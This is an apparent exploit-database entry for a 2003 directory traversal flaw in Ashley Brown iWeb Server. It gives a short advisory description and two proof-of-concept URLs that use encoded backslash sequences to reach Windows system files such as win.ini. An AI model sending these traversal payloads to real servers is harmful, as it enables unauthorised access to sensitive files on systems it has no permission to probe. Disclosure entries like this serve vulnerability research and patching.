Ashley Brown iWeb Server - Encoded Backslash Directory Traversal
Author: cr-secure.net
type: remote
platform: windows
port:
date_added: 2003-10-31
date_updated: 2012-12-12
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/8943/info
It has been reported that iWeb Server is prone a directory traversal issue allowing a remote attacker to traverse outside the server root directory by using '..%5C' character sequences.
Successful exploitation of this vulnerability may allow a remote attacker to gain access to sensitive information, which may be used to mount further attacks against a vulnerable system.
http://127.0.0.1/..%5C..%5C..%5C.. %5C..%5C..%5C/winnt/win.ini
http://127.0.0.1/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/system32/registry.inf